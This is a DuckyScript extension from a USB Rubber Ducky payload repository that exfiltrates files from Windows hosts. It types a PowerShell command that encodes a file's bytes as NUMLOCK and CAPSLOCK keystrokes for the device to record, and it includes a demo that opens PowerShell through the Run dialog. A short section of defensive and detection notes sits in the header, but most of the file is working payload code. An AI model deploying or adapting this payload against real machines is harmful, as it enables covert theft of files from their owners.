hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/extensions/windows_hid_exfil.txt
EXTENSION WINDOWS_HID_EXFIL
    REM VERSION 1.1
    REM AUTHOR: Korben

    REM_BLOCK DOCUMENTATION
        Helpers for Keystroke Reflection data exfiltration
        This payload is a proof of concept for USB HID only Data Exfiltration

        TARGET:
            Windows Host that supports powershell and SendKeys

        USAGE:
            Prepare data to exfil (in filename defined by TARGET_FILE below)
            with a powershell window already open - call RUN_WINDOWS_EXFIL()

        DEPLOYMENT:
            Plug Ducky into host, wait for the LED to turn (and stay) solid green.

        HOW IT WORKS:
            RUN_WINDOWS_EXFIL() types one PowerShell command into the focused
            window. The command reads TARGET_FILE as bytes and walks each byte
            through the masks 0x80 down to 0x01: a set bit is encoded as a
            NUMLOCK keystroke, a clear bit as a CAPSLOCK keystroke. One
            SCROLLLOCK keystroke is appended as the end-of-data marker and the
            whole sequence is sent with System.Windows.Forms.SendKeys.
            The function then waits for the scroll-lock change before it
            leaves exfil mode. No storage or network interface is involved.

        DEFENSIVE NOTES:
            - Blocking USB mass storage does not close this channel, because
              the device only has to enumerate as a keyboard. USB device
              control that restricts which HID keyboards may attach does.
            - The command is typed into an interactive PowerShell session, so
              script block logging and transcription record it. Add-Type of
              System.Windows.Forms followed by a SendKeys string made up only
              of lock keys is a usable detection pattern.
            - Constrained Language Mode should refuse both the Add-Type call
              and the SendKeys method call (confirm on the target build).
    END_REM

    REM CONFIGURATION:
    REM File on host machine to exfil
    REM The name is relative, so it resolves against the shell's current directory.
    DEFINE #TARGET_FILE filename.txt

    REM TRUE: save the host lock-key state before the transfer and restore it afterwards.
    DEFINE #SAVE_AND_RESTORE_LOCKS TRUE
    REM TRUE: LED off and $_EXFIL_LEDS_ENABLED set during the transfer, LED green when done.
    DEFINE #ENABLE_EXFIL_LEDS TRUE
    REM TRUE: append "exit;" to the typed command so the PowerShell session closes afterwards.
    DEFINE #CLOSE_AFTER_EXFIL TRUE

    REM TRUE: run the demo at the bottom of this extension (it writes to #TARGET_FILE).
    DEFINE #RUN_SIMPLE_USAGE_DEMO FALSE

    REM RUN_WINDOWS_EXFIL: type the encoder command into the already-focused
    REM PowerShell window, then block until the scroll-lock end marker is seen.
    REM Takes no arguments; behaviour is controlled by the DEFINEs above.
    FUNCTION RUN_WINDOWS_EXFIL()
        IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
            SAVE_HOST_KEYBOARD_LOCK_STATE
        END_IF_DEFINED

        IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
            LED_OFF
            $_EXFIL_LEDS_ENABLED = TRUE
        END_IF_DEFINED

        REM Exfil mode is switched on before the command is typed, so it is
        REM already active when the host starts sending lock keys.
        REM NOTE(review): what the firmware records in this mode is not shown
        REM in this file - confirm against the DuckyScript documentation.
        $_EXFIL_MODE_ENABLED = TRUE
        REM Everything between STRING_POWERSHELL and END_STRING is typed on the
        REM host, so no REM lines may be placed inside it. Bits are emitted most
        REM significant first: NUMLOCK for 1, CAPSLOCK for 0, SCROLLLOCK as EOF.
        STRING_POWERSHELL
            foreach($b in $(Get-Content "#TARGET_FILE" -Encoding byte)){
                foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){
                    If($b -band $a){
                        $o+="%{NUMLOCK}"
                    }Else{
                        $o+="%{CAPSLOCK}"
                    }
                }
            };
            $o+="%{SCROLLLOCK}";
            Add-Type -Assembly System.Windows.Forms;
            [System.Windows.Forms.SendKeys]::SendWait("$o");
        END_STRING
        IF_DEFINED_TRUE #CLOSE_AFTER_EXFIL
            STRING exit;
        END_IF_DEFINED

        REM Submit the typed line; nothing runs on the host until this ENTER.
        ENTER

        REM Listen for EOF
        REM Blocks until the scroll-lock state changes, i.e. the end marker arrived.
        WAIT_FOR_SCROLL_CHANGE
        $_EXFIL_MODE_ENABLED = FALSE

        IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
            LED_G
        END_IF_DEFINED

        IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
            RESTORE_HOST_KEYBOARD_LOCK_STATE
        END_IF_DEFINED
    END_FUNCTION

    REM Demo, compiled in only when #RUN_SIMPLE_USAGE_DEMO is TRUE.
    REM It overwrites #TARGET_FILE in the shell's current directory with "test123".
    REM The fixed DELAYs assume the Run dialog and PowerShell open within 500 ms.
    IF_DEFINED_TRUE #RUN_SIMPLE_USAGE_DEMO
        REM DO NOT MODIFY THIS DEMO - copy and move outside extension if using as template.
        REM DEMO Boot Delay
        DELAY 3000
        REM Open run dialog
        GUI r
        DELAY 500
        REM Open Powershell
        STRINGLN powershell
        DELAY 500
        REM Prepare some data in TARGET_FILE
        STRINGLN echo test123 > #TARGET_FILE
        DELAY 500
        REM Exfil data to USB Rubber Ducky using Keystroke Reflection
        RUN_WINDOWS_EXFIL()
    END_IF_DEFINED
END_EXTENSION